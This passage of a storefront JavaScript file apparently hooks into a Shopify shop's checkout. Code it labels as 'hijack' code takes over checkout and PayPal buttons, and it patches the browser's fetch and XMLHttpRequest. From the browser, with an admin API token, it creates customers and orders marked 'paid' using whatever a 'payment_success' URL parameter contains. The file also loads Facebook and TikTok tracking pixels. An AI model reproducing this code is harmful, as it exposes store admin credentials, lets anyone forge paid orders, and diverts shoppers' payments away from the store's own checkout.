        button.innerHTML = '<span style="display:block;width:18px;height:18px;margin:0 auto;border:2px solid currentColor;border-top-color:transparent;border-radius:50%;animation:checkout-spin .6s linear infinite;"></span>';
    }

    /**
     * 恢复所有加载中的按钮（用于页面返回时）
     */
    function restoreAllButtonLoading() {
        document.querySelectorAll('[data-loading="true"]').forEach(button => {
            if (button.dataset.originalHtml) {
                button.innerHTML = button.dataset.originalHtml;
            }
            button.disabled = false;
            button.style.pointerEvents = '';
            button.dataset.loading = '';
        });
    }

    // 初始化劫持
    function initHijack() {
        addPaymentInterceptStyles();
        document.querySelectorAll('button, input[type="submit"], a').forEach(hijackCheckoutButton);
        handleSpecialPaymentButtons();
        setTimeout(handleSpecialPaymentButtons, 2000);
    }

    // 监听DOM变化
    const observer = new MutationObserver(function (mutations) {
        mutations.forEach(function (mutation) {
            mutation.addedNodes.forEach(function (node) {
                if (node.nodeType === 1) {
                    // 检查新添加的节点是否为按钮
                    if (node.matches && (node.matches('button') || node.matches('input[type="submit"]') || node.matches('a'))) {
                        hijackCheckoutButton(node);
                    }
                    // 检查新添加节点内的按钮
                    if (node.querySelectorAll) {
                        const buttons = node.querySelectorAll('button, input[type="submit"], a');
                        buttons.forEach(hijackCheckoutButton);
                    }

                    // 检查是否有新的PayPal或支付选项元素
                    if (node.matches && (
                        node.matches('iframe[name*="paypal"]') ||
                        node.matches('iframe[title*="PayPal"]') ||
                        node.matches('.paypal-button-container') ||
                        node.matches('.shopify-payment-button__more-options') ||
                        node.matches('more-payment-options-link')
                    )) {
                        handleSpecialPaymentButtons();
                    }

                    // 检查新添加节点内的特殊支付元素
                    if (node.querySelectorAll) {
                        const specialElements = node.querySelectorAll('iframe[name*="paypal"], iframe[title*="PayPal"], .paypal-button-container, .shopify-payment-button__more-options, more-payment-options-link');
                        if (specialElements.length > 0) {
                            handleSpecialPaymentButtons();
                        }
                    }
                }
            });
        });
    });

    // 全局点击监听器，捕获可能遗漏的支付按钮点击
    document.addEventListener('click', async function (e) {
        const target = e.target;

        // 检查是否是特殊支付按钮
        const isSpecialPayment = target.closest('iframe[name*="paypal"]') ||
                                  target.closest('iframe[title*="PayPal"]') ||
                                  target.closest('.paypal-button-container') ||
                                  target.closest('.paypal-buttons') ||
                                  target.matches('.shopify-payment-button__more-options') ||
                                  target.matches('#more-payment-options-link') ||
                                  target.closest('more-payment-options-link');

        if (isSpecialPayment && !target.dataset.hijacked && !target.closest('[data-hijacked="true"]')) {
            await handleSpecialPaymentClick(target, e);
        }
    }, true);

    // 监听页面显示事件（包括从其他页面返回）
    window.addEventListener('pageshow', function() {
        // 从 bfcache 恢复或正常返回时，恢复所有加载中的按钮
        restoreAllButtonLoading();

        // 检查是否从结账页面返回
        const fromCheckout = sessionStorage.getItem('from_checkout_redirect');

        if (fromCheckout === 'true') {
            // 清除标记
            sessionStorage.removeItem('from_checkout_redirect');
            // 重新初始化按钮劫持（不再 reload，避免额外请求触发 429 限流）
            initHijack();
        }
    });

    // 启动
    if (document.readyState === 'loading') {
        document.addEventListener('DOMContentLoaded', function() {
            initHijack();
            observer.observe(document.body, {
                childList: true,
                subtree: true
            });
        });
    } else {
        initHijack();
        if (document.body) {
            observer.observe(document.body, {
                childList: true,
                subtree: true
            });
        }
    }

    // 检查是否从支付页面返回，如果是则创建订单
    function checkPaymentReturn() {
        const urlParams = new URLSearchParams(window.location.search);
        const paymentSuccess = urlParams.get('payment_success');
        const fromThankYou = urlParams.get('from_thank_you');

        if (paymentSuccess) {

            // 立即清除URL参数，防止重复创建订单
            clearPaymentSuccessParam();

            try {
                const paymentData = JSON.parse(decodeURIComponent(paymentSuccess));

                if (paymentData.success === '1') {
                    createShopifyOrder(paymentData);
                }
            } catch (error) {
            }
        } else if (fromThankYou) {
            // 从感谢页面返回，检查是否需要创建订单
            checkOrderCreationFromThankYou();
        }
    }

    // 从感谢页面返回时检查订单创建
    function checkOrderCreationFromThankYou() {
        try {
            // 从sessionStorage获取支付数据
            const paymentDataStr = sessionStorage.getItem('payment_data');

            if (paymentDataStr) {
                const paymentData = JSON.parse(paymentDataStr);

                if (paymentData.success === '1') {
                    createShopifyOrder(paymentData);
                    // 清除sessionStorage中的支付数据
                    sessionStorage.removeItem('payment_data');
                }
            }
        } catch (error) {
            // 静默失败
        }
    }

    // 清除URL中的payment_success参数
    function clearPaymentSuccessParam() {
        const url = new URL(window.location);
        url.searchParams.delete('payment_success');

        // 使用replaceState避免在浏览器历史中留下记录
        window.history.replaceState({}, document.title, url.toString());
    }

    // 尝试通过产品标题查找variant_id
    async function findVariantByTitle(productTitle) {
        try {
            const searchResponse = await fetch(`/search/suggest.json?q=${encodeURIComponent(productTitle)}&resources[type]=product&resources[limit]=1`);
            if (!searchResponse.ok) return null;
            const searchData = await searchResponse.json();
            if (!searchData.resources?.results?.products?.[0]) return null;
            const productResponse = await fetch(`/products/${searchData.resources.results.products[0].handle}.js`);
            const productData = productResponse.ok ? await productResponse.json() : null;
            return productData?.variants?.[0]?.id || null;
        } catch (error) {
            return null;
        }
    }

    // 防止重复创建订单的标志
    let isCreatingOrder = false;

    // 创建Shopify订单
    async function createShopifyOrder(paymentData) {

        // 防止重复创建订单
        if (isCreatingOrder) {
            return;
        }

        isCreatingOrder = true;
        const shopifyDomain = window.location.hostname;

        // 检查是否有完整的支付数据
        if (!paymentData.cart || !paymentData.cart.items) {
            isCreatingOrder = false;
            return;
        }

        // 数据格式标准化 - 确保使用正确的字段名
        let items = paymentData.cart.items || paymentData.cart.products || [];
        if (!Array.isArray(items)) {
            isCreatingOrder = false;
            return;
        }


        // 尝试为没有variant_id的商品查找真实的variant_id
        for (let item of items) {
            if (!item.id || item.id === 'unknown' || isNaN(item.id) || parseInt(item.id) <= 0) {
                const foundVariantId = await findVariantByTitle(item.title);
                if (foundVariantId) {
                    item.id = foundVariantId.toString();
                }
            }
        }

        // 尝试创建或查找用户账户
        let customerId = null;
        try {
            // 首先尝试查找现有用户
            const customerSearchResponse = await fetch(`https://${shopifyDomain}/admin/api/2023-10/customers/search.json?query=email:${encodeURIComponent(paymentData.customer_email)}`, {
                headers: {
                    'X-Shopify-Access-Token': SHOPIFY_ADMIN_TOKEN
                }
            });

            if (customerSearchResponse.ok) {
                const customerSearchResult = await customerSearchResponse.json();
                if (customerSearchResult.customers && customerSearchResult.customers.length > 0) {
                    customerId = customerSearchResult.customers[0].id;
                }
            }

            // 如果没有找到用户，创建新用户
            if (!customerId) {
                const customerData = {
                    customer: {
                        first_name: paymentData.customer_firstName,
                        last_name: paymentData.customer_lastName,
                        email: paymentData.customer_email,
                        verified_email: true,
                        addresses: [{
                            first_name: paymentData.billing_address.first_name,
                            last_name: paymentData.billing_address.last_name,
                            address1: paymentData.billing_address.address1,
                            address2: paymentData.billing_address.address2,
                            city: paymentData.billing_address.city,
                            province: paymentData.billing_address.province,
                            zip: paymentData.billing_address.zip,
                            country: paymentData.billing_address.country
                        }]
                    }
                };

                const customerCreateResponse = await fetch(`https://${shopifyDomain}/admin/api/2023-10/customers.json`, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                        'X-Shopify-Access-Token': SHOPIFY_ADMIN_TOKEN
                    },
                    body: JSON.stringify(customerData)
                });

                if (customerCreateResponse.ok) {
                    const customerResult = await customerCreateResponse.json();
                    customerId = customerResult.customer.id;
                }
            }
        } catch (error) {
            // 静默失败
        }

        // 构建订单备注
        const orderNote = `Payment method: ${paymentData.paymentMethod}\nOrder source: ${paymentData.is_direct_purchase ? 'Direct Purchase' : 'Cart Checkout'}`;

        // 构建订单数据
        const orderData = {
            order: {
                email: paymentData.customer_email,
                financial_status: 'paid',
                fulfillment_status: null,
                send_receipt: true,
                send_fulfillment_receipt: true,
                note: orderNote,
                // 添加客户信息，确保订单与用户关联
                customer: {
                    first_name: paymentData.customer_firstName,
                    last_name: paymentData.customer_lastName,
                    email: paymentData.customer_email
                },
                // 添加客户ID，如果存在的话
                customer_id: customerId || null,
                // 添加标签，便于识别
                tags: ['custom-checkout', paymentData.paymentMethod.toLowerCase().replace(' ', '-')],
                // 确保订单与用户账户关联
                customer_locale: 'en',
                currency: paymentData.cart.currency || 'USD',
                // 添加订单来源信息
                source_name: 'custom-checkout',
                source_identifier: 'custom-checkout-plugin',
                billing_address: {
                    first_name: paymentData.billing_address.first_name,
                    last_name: paymentData.billing_address.last_name,
                    address1: paymentData.billing_address.address1,
                    address2: paymentData.billing_address.address2,
                    city: paymentData.billing_address.city,
                    province: paymentData.billing_address.province,
                    zip: paymentData.billing_address.zip,
                    country: paymentData.billing_address.country
                },
                shipping_address: {
                    first_name: paymentData.shipping_address.first_name,
                    last_name: paymentData.shipping_address.last_name,
                    address1: paymentData.shipping_address.address1,
                    address2: paymentData.shipping_address.address2,
                    city: paymentData.shipping_address.city,
                    province: paymentData.shipping_address.province,
                    zip: paymentData.shipping_address.zip,
                    country: paymentData.shipping_address.country
                },
                line_items: items.map(item => {
                    // 检查是否有真实的variant_id
                    const variantId = item.id;
                    const hasValidVariantId = variantId &&
                        variantId !== 'unknown' &&
                        variantId !== null &&
                        variantId !== undefined &&
                        !isNaN(variantId) &&
                        parseInt(variantId) > 0;

                   
                    if (hasValidVariantId) {
                        // 使用真实的Shopify商品变体 - 图片会自动显示在商品旁边
                        return {
                            variant_id: parseInt(variantId),
                            quantity: item.quantity
                        };
                    } else {
                        // 使用自定义商品格式
                        const lineItem = {
                            title: item.title,
                            price: (item.price / 100).toFixed(2),
                            quantity: item.quantity,
                            requires_shipping: true,
                            taxable: true
                        };

                        // 如果有变体标题，添加到订单项中
                        if (item.variant_title && item.variant_title.trim() !== '') {
                            lineItem.variant_title = item.variant_title;
                        }

                        return lineItem;
                    }
                }),
                note_attributes: [
                    {
                        name: 'Order Source',
                        value: paymentData.is_direct_purchase ? 'Direct Purchase' : 'Cart Checkout'
                    },
                    {
                        name: 'Payment Method',
                        value: paymentData.paymentMethod
                    }
                ],
                transactions: [{
                    kind: 'sale',
                    status: 'success',
                    amount: (paymentData.cart.total_price / 100).toFixed(2),
                    currency: paymentData.cart.currency || 'USD',
                    gateway: paymentData.paymentMethod
                }]
            }
        };


        try {
            const response = await fetch(`https://${shopifyDomain}/admin/api/2023-10/orders.json`, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                    'X-Shopify-Access-Token': SHOPIFY_ADMIN_TOKEN
                },
                body: JSON.stringify(orderData)
            });


            if (response.ok) {
                const result = await response.json();

                // 检查响应中是否包含订单信息
                if (result.order) {
                } else {
                    // 无订单信息
                }

                // 只有购物车结账才清空购物车并刷新显示
                // 单品购买不清空购物车，保留用户原有的购物车商品
                if (!paymentData.is_direct_purchase) {
                    // 将订单信息存储到sessionStorage，用于页面刷新后显示
                    try {
                        sessionStorage.setItem('pending_order_success', JSON.stringify(result.order));
                    } catch (error) {
                        // 静默失败
                    }

                    // 快速清空购物车并刷新页面
                    await clearCart();
                } else {
                    // 单品购买直接显示成功消息
                    if (result.order) {
                        showOrderSuccessMessage(result.order);
                    } else {
                        // 无订单信息
                    }
                }
            } else {
                // API调用失败
            }
        } catch (error) {
            // 静默失败
        } finally {
            // 无论成功还是失败，都重置创建标志
            isCreatingOrder = false;
        }
    }

    // 显示订单成功消息
    function showOrderSuccessMessage(order) {
        // 检查是否已经有成功消息，避免重复显示
        const existingMessage = document.querySelector('.order-success-message');
        if (existingMessage) {
            existingMessage.remove();
        }

        const message = document.createElement('div');
        message.className = 'order-success-message';
        message.style.cssText = `
            position: fixed;
            top: 20px;
            right: 20px;
            background: linear-gradient(135deg, #28a745 0%, #20c997 100%);
            color: white;
            padding: 20px 25px;
            border-radius: 12px;
            box-shadow: 0 10px 25px -5px rgba(0, 0, 0, 0.3);
            z-index: 10000;
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
            font-size: 14px;
            max-width: 350px;
            min-width: 300px;
            animation: slideInRight 0.4s ease-out;
            border: 1px solid rgba(255, 255, 255, 0.2);
        `;

        // 添加动画样式
        if (!document.querySelector('#success-message-styles')) {
            const style = document.createElement('style');
            style.id = 'success-message-styles';
            style.textContent = `
                @keyframes slideInRight {
                    from {
                        opacity: 0;
                        transform: translateX(100%);
                    }
                    to {
                        opacity: 1;
                        transform: translateX(0);
                    }
                }
                @keyframes slideOutRight {
                    from {
                        opacity: 1;
                        transform: translateX(0);
                    }
                    to {
                        opacity: 0;
                        transform: translateX(100%);
                    }
                }
            `;
            document.head.appendChild(style);
        }

        // 构建正确的订单查看链接
        const currentDomain = window.location.hostname;
        const customerOrderDetailUrl = `https://${currentDomain}/account/orders/${order.id}`;


        message.innerHTML = `
            <div style="position: relative;">
                <!-- 关闭按钮 -->
                <button onclick="this.closest('.order-success-message').remove()" style="
                    position: absolute;
                    top: -8px;
                    right: -8px;
                    background: rgba(255, 255, 255, 0.2);
                    color: white;
                    border: none;
                    width: 24px;
                    height: 24px;
                    border-radius: 50%;
                    cursor: pointer;
                    font-size: 14px;
                    font-weight: bold;
                    display: flex;
                    align-items: center;
                    justify-content: center;
                    transition: all 0.3s ease;
                " onmouseover="this.style.background='rgba(255, 255, 255, 0.3)'" onmouseout="this.style.background='rgba(255, 255, 255, 0.2)'">×</button>
                
                <div style="display: flex; align-items: center; margin-bottom: 12px;">
                    <svg width="24" height="24" viewBox="0 0 24 24" fill="none" style="margin-right: 10px;">
                        <circle cx="12" cy="12" r="12" fill="rgba(255, 255, 255, 0.2)"/>
                        <path d="M10 14L8 12L7.29 12.71L10 15.41L17 8.41L16.29 7.7L10 14Z" fill="white"/>
                    </svg>
                    <div>
                        <div style="font-size: 16px; font-weight: 600; margin-bottom: 2px;">Payment Successful!</div>
                        <div style="font-size: 12px; opacity: 0.9;">Order #${order.order_number} - ${order.currency} ${order.total_price}</div>
                    </div>
                </div>
                
                <a href="${customerOrderDetailUrl}" style="
                    background: rgba(255, 255, 255, 0.2);
                    color: white;
                    text-decoration: none;
                    padding: 8px 16px;
                    border-radius: 6px;
                    font-size: 13px;
                    font-weight: 500;
                    display: inline-block;
                    transition: all 0.3s ease;
                    border: 1px solid rgba(255, 255, 255, 0.3);
                " onmouseover="this.style.background='rgba(255, 255, 255, 0.3)'" onmouseout="this.style.background='rgba(255, 255, 255, 0.2)'">View Order</a>
            </div>
        `;

        document.body.appendChild(message);


        // 15秒后自动移除消息
        setTimeout(() => {
            if (message.parentNode) {
                message.style.animation = 'modalSlideOut 0.5s ease-out';
                setTimeout(() => {
                    if (message.parentNode) {
                        message.parentNode.removeChild(message);
                    }
                }, 500);
            }
        }, 15000);

    }

    // 清空购物车并刷新页面显示
    async function clearCart() {
        try {
            const response = await fetch('/cart/clear.js', { method: 'POST' });
            if (!response.ok) {
                const cartResponse = await fetch('/cart.js');
                if (cartResponse.ok) {
                    const cart = await cartResponse.json();
                    for (const item of cart.items) {
                        await fetch('/cart/change.js', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ id: item.variant_id, quantity: 0 }) });
                    }
                }
            }
            refreshCartDisplay();
        } catch (error) {
            // 静默失败
        }
    }

    // 通知主题刷新购物车 UI，购物车页直接 reload
    function refreshCartDisplay() {
        if (window.theme?.cart?.update) window.theme.cart.update();
        document.dispatchEvent(new CustomEvent('cart:updated'));
        updateCartCount(0);
        if (window.location.pathname.includes('/cart')) {
            setTimeout(() => { window.location.reload(); }, 50);
        }
    }

    // 更新购物车数量显示
    function updateCartCount(count) {
        document.querySelectorAll('.cart-count, [data-cart-count], .cart-item-count, .header__cart-count').forEach(element => {
            if (element) {
                element.textContent = count;
                if (count === 0) {
                    element.style.display = 'none';
                } else {
                    element.style.display = '';
                }
            }
        });
    }




    // 检查是否有待显示的成功消息
    function checkPendingOrderSuccess() {
        try {
            const pendingOrder = sessionStorage.getItem('pending_order_success');
            if (pendingOrder) {
                const orderData = JSON.parse(pendingOrder);

                // 显示成功消息
                showOrderSuccessMessage(orderData);

                // 清除sessionStorage中的待显示消息
                sessionStorage.removeItem('pending_order_success');
            }
        } catch (error) {
            // 静默失败
        }
    }

    // 页面加载时检查支付返回
    if (document.readyState === 'loading') {
        document.addEventListener('DOMContentLoaded', function () {
            checkPaymentReturn();
            checkPendingOrderSuccess();
        });
    } else {
        checkPaymentReturn();
        checkPendingOrderSuccess();
    }

    // ==================== AddToCart 事件追踪 ====================

    // 获取当前页面的产品信息（用于AddToCart事件）
    function getCurrentProductInfo() {
        try {
            // 方法1: 从Shopify的产品JSON获取
            if (window.ShopifyAnalytics && window.ShopifyAnalytics.meta && window.ShopifyAnalytics.meta.product) {
                const product = window.ShopifyAnalytics.meta.product;
                return {
                    id: product.id,
                    title: product.title || '',
                    price: product.price || '0',
                    variant_id: product.variants && product.variants[0] ? product.variants[0].id : null
                };
            }

            // 方法2: 从页面元素获取
            const titleElement = Utils.findElement(CONFIG.TITLE_SELECTORS, document);
            const priceElement = Utils.findElement(CONFIG.PRICE_SELECTORS, document);
            const variantElement = Utils.findElement(CONFIG.VARIANT_SELECTORS, document);

            if (titleElement || priceElement) {
                return {
                    id: variantElement ? variantElement.value : null,
                    title: titleElement ? titleElement.textContent.trim() : '',
                    price: priceElement ? priceElement.textContent.trim().replace(/[^\d.]/g, '') || '0' : '0',
                    variant_id: variantElement ? variantElement.value : null
                };
            }

            return null;
        } catch (error) {
            return null;
        }
    }

    // ==================== 像素 SDK 与事件上报 ====================

    const FB_EVENTS_SRC = 'https://connect.facebook.net/en_US/fbevents.js';

    // 确保 Facebook SDK 存在（不覆盖第三方已注入的 fbq）
    function ensureFacebookPixelSdk() {
        if (typeof window.fbq === 'undefined') {
            !function (f, b, e, v, n, t, s) {
                if (f.fbq) return;
                n = f.fbq = function () {
                    n.callMethod ?
                        n.callMethod.apply(n, arguments) : n.queue.push(arguments)
                };
                if (!f._fbq) f._fbq = n;
                n.push = n; n.loaded = !0; n.version = '2.0';
                n.queue = [];
                t = b.createElement(e); t.async = !0;
                t.src = v;
                s = b.getElementsByTagName('script')[0];
                s.parentNode.insertBefore(t, s)
            }(window, document, 'script', FB_EVENTS_SRC);
            return;
        }

        if (!document.querySelector('script[src*="fbevents.js"]')) {
            const script = document.createElement('script');
            script.async = true;
            script.src = FB_EVENTS_SRC;
            const first = document.getElementsByTagName('script')[0];
            first.parentNode.insertBefore(script, first);
        }
    }

    // 确保 TikTok SDK 存在（不覆盖第三方已注入的 ttq）
    function ensureTikTokPixelSdk() {
        if (typeof window.ttq !== 'undefined' && typeof window.ttq.load === 'function') {
            return;
        }

        !function (w, d, t) {
            w.TiktokAnalyticsObject = t;
            var ttq = w[t] = w[t] || [];
            ttq.methods = ["page", "track", "identify", "instances", "debug", "on", "off", "once", "ready", "alias", "group", "enableCookie", "disableCookie"];
            ttq.setAndDefer = function (t, e) {
                t[e] = function () {
                    t.push([e].concat(Array.prototype.slice.call(arguments, 0)))
                }
            };
            for (var i = 0; i < ttq.methods.length; i++) ttq.setAndDefer(ttq, ttq.methods[i]);
            ttq.instance = function (t) {
                for (var e = ttq._i[t] || [], n = 0; n < ttq.methods.length; n++) ttq.setAndDefer(e, ttq.methods[n]);
                return e
            };
            ttq.load = function (e, n) {
                var i = "https://analytics.tiktok.com/i18n/pixel/events.js";
                ttq._i = ttq._i || {};
                ttq._i[e] = [];
                ttq._i[e]._u = i;
                ttq._t = ttq._t || {};
                ttq._t[e] = +new Date;
                ttq._o = ttq._o || {};
                ttq._o[e] = n || {};
                var o = document.createElement("script");
                o.type = "text/javascript";
                o.async = !0;
                o.src = i + "?sdkid=" + e + "&lib=" + t;
                var a = document.getElementsByTagName("script")[0];
                a.parentNode.insertBefore(o, a)
            };
        }(window, document, 'ttq');
    }

    // TikTok 事件上报（仅触达指定 pixel，避免影响其他插件）
    function ttqTrackEvent(pixelId, eventName, eventData) {
        if (!pixelId || typeof window.ttq === 'undefined') {
            return false;
        }

        if (typeof window.ttq.instance === 'function') {
            window.ttq.instance(pixelId).track(eventName, eventData);
        } else {
            window.ttq.track(eventName, eventData);
        }

        return true;
    }

    // 加载并初始化 Facebook Pixel
    function loadFacebookPixel() {
        const pixelId = getFacebookPixelId();
        if (!pixelId) {
            return false;
        }

        ensureFacebookPixelSdk();
        window.fbq('init', pixelId);
        window.fbq('trackSingle', pixelId, 'PageView');
        return true;
    }

    // 加载并初始化 TikTok Pixel
    function loadTikTokPixel() {
        const pixelId = getTikTokPixelId();
        if (!pixelId) {
            return false;
        }

        ensureTikTokPixelSdk();

        if (!window.ttq._i || !window.ttq._i[pixelId]) {
            window.ttq.load(pixelId);
        }

        if (typeof window.ttq.instance === 'function') {
            window.ttq.instance(pixelId).page();
        } else {
            window.ttq.page();
        }

        return true;
    }

    // Facebook 添加到购物车
    function fbq_report_addtocart() {
        const pixelId = getFacebookPixelId();
        if (!pixelId || typeof window.fbq === 'undefined') {
            return false;
        }

        const productInfo = getCurrentProductInfo();
        if (!productInfo) {
            return false;
        }

        window.fbq('trackSingle', pixelId, 'AddToCart', {
            content_ids: [productInfo.id],
            content_type: 'product',
            content_name: productInfo.title,
            value: parseFloat(productInfo.price) || 0,
            currency: 'USD'
        });
        return true;
    }

    // Facebook 查看内容
    function fbq_report_viewcontent() {
        const pixelId = getFacebookPixelId();
        if (!pixelId || typeof window.fbq === 'undefined') {
            return false;
        }

        const productInfo = getCurrentProductInfo();
        if (!productInfo) {
            return false;
        }

        window.fbq('trackSingle', pixelId, 'ViewContent', {
            content_ids: [productInfo.id],
            content_type: 'product',
            content_name: productInfo.title,
            value: parseFloat(productInfo.price) || 0,
            currency: 'USD'
        });
        return true;
    }

    // TikTok 添加到购物车
    function ttq_report_addtocart() {
        const pixelId = getTikTokPixelId();
        if (!pixelId) {
            return false;
        }

        const productInfo = getCurrentProductInfo();
        if (!productInfo) {
            return false;
        }

        return ttqTrackEvent(pixelId, 'AddToCart', {
            content_id: productInfo.id,
            content_type: 'product',
            content_name: productInfo.title,
            value: parseFloat(productInfo.price) || 0,
            currency: 'USD'
        });
    }

    // ==================== 监听添加到购物车事件 ====================

    // 监听添加到购物车的API请求
    function setupAddToCartTracking() {
        // 监听fetch请求（现代Shopify主题使用）
        const originalFetch = window.fetch;
        window.fetch = function (...args) {
            const url = args[0];

            // 检测添加到购物车的API请求
            if (typeof url === 'string' &&
                (url.includes('/cart/add') ||
                    url.includes('/cart/add.js') ||
                    url.includes('/cart/change'))) {

                return originalFetch.apply(this, args).then(response => {
                    if (response.ok && url.includes('/cart/add')) {
                        fbq_report_addtocart();
                        ttq_report_addtocart();
                    }
                    return response;
                });
            }

            return originalFetch.apply(this, args);
        };

        // 监听XMLHttpRequest（旧版Shopify主题使用）
        const originalOpen = XMLHttpRequest.prototype.open;
        const originalSend = XMLHttpRequest.prototype.send;

        XMLHttpRequest.prototype.open = function (method, url) {
            this._url = url;
            return originalOpen.apply(this, arguments);
        };

        XMLHttpRequest.prototype.send = function () {
            if (this._url && this._url.includes('/cart/add')) {
                this.addEventListener('load', function () {
                    if (this.status === 200) {
                        fbq_report_addtocart();
                        ttq_report_addtocart();
                    }
                });
            }
            return originalSend.apply(this, arguments);
        };
    }

    // ==================== 检测商品页面并触发ViewContent事件 ====================

    // 检测是否为商品页面
    function isProductPage() {
        // 方法1: 检查URL路径
        const path = window.location.pathname;
        if (path.includes('/products/')) {
            return true;
        }

        // 方法2: 检查页面中是否有产品数据
        if (window.meta?.page?.pageType === 'product' ||
            window.ShopifyAnalytics?.meta?.page?.pageType === 'product') {
            return true;
        }

        // 方法3: 检查是否有产品表单
        if (document.querySelector('form[action*="/cart/add"]')) {
            return true;
        }

        return false;
    }

    // 触发Facebook ViewContent事件（商品页面）
    function triggerFacebookViewContent() {
        if (!getFacebookPixelId()) {
            return;
        }

        if (!isProductPage()) {
            return;
        }

        // 延迟触发，确保Facebook Pixel已加载
        setTimeout(() => {
            fbq_report_viewcontent();
        }, 1000);
    }

    // ==================== 初始化广告跟踪 ====================

    // 初始化广告跟踪（Facebook Pixel + TikTok Pixel）
    function initAdsTracking() {
        // 检查是否配置了任何广告平台（使用函数获取，支持URL参数）
        const hasFacebookPixel = getFacebookPixelId();
        const hasTikTokPixel = getTikTokPixelId();

        if (!hasFacebookPixel && !hasTikTokPixel) {
            return;
        }

        // 加载Facebook Pixel（如果配置了）
        if (hasFacebookPixel) {
            loadFacebookPixel();

            // 触发ViewContent事件（如果是商品页面）
            triggerFacebookViewContent();
        }

        // 加载TikTok Pixel（如果配置了）
        if (hasTikTokPixel) {
            loadTikTokPixel();
        }

        // 设置添加到购物车事件监听
        setupAddToCartTracking();
    }

    // 页面加载完成后初始化广告跟踪
    if (document.readyState === 'loading') {
        document.addEventListener('DOMContentLoaded', initAdsTracking);
    } else {
        initAdsTracking();
    }

})();